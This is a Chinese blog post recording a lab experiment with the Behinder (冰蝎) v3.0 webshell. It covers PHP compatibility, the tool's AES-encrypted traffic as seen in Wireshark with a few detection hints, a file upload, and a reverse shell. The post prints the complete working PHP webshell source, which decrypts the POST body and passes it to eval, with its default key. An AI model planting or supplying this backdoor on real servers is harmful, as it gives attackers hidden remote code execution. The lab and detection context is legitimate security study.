冰蝎v3.0 beta7来啦

我用了一台kali,一台centos,一台windows,做了一个文件上传和一个反弹shell实验,载荷是AES加密的,终于感受到了对加密流量的无可奈何~

  • kali(php8.1)
  • centos(php7.1)
  • windows7(冰蝎3.0 java1.8)

ailx10

1949 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

亲测冰蝎3.0不支持php7.1,一直连接不上

php7.1 一直连接失败

更换成php8.1就好了,这里是kali环境

php8.1 连击成功了

通过wireshark抓包冰蝎加密流量,可以看到请求的uri和referer是一样的,重新打开一次又发现是不同的,没有了密钥协商过程了,面对加密报文,束手无策了。行为上还是可以看出一点点端倪,在http中同一个url会被访问很多次,并且访问的源IP会非常少,毕竟这是webshell共通的特性~

POST /shell.php HTTP/1.1\r\n
referer : http://172.16.20.131/shell.php
referer : http://172.16.20.131/CKAJ.php

冰蝎加密流量

冰蝎文件加密上传,我上传了一个beacon.exe程序

冰蝎文件上传

冰蝎反弹shell,将靶机kali的shell反弹到我的centos上,这里很人性化的给了用法,直接跟着敲就行~

冰蝎反弹shell

点击「给我连」,我这边反弹到centos上,大致情况如下

反弹shell到centos

代码如下,以后再分析吧~

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

发布于 2022-10-14 16:09

相关推荐
马船长1 小时前
bat脚本实现自动化漏洞挖掘
运维·网络安全·自动化
飞火流星020271 小时前
系统URL整合系列视频一(需求方案)
网络·web安全·react.js·url整合·web资源整合·web资源地址统一整合·url地址整合
doubt。21 小时前
2.[网鼎杯 2020 朱雀组]phpweb
网络·安全·web安全·网络安全·php·代码复审
程序猿编码1 天前
自定义命令执行器:C++中命令封装的深度探索(C/C++实现)
linux·c语言·c++·网络安全·shell·命令行
star010-1 天前
【视频+图文详解】HTML基础4-html标签的基本使用
前端·windows·经验分享·网络安全·html·html5
star010-1 天前
一文学会HTML编程之视频+图文详解详析
前端·网络·网络安全·html·html5
star010-1 天前
【视频+图文详解】HTML基础3-html常用标签
前端·css·网络安全·html·html5·学习方法
云空2 天前
《DeepSeek 网页/API 性能异常(DeepSeek Web/API Degraded Performance):网络安全日志》
运维·人工智能·web安全·网络安全·开源·网络攻击模型·安全威胁分析
doubt。2 天前
8.攻防世界Web_php_wrong_nginx_config
网络·安全·web安全·网络安全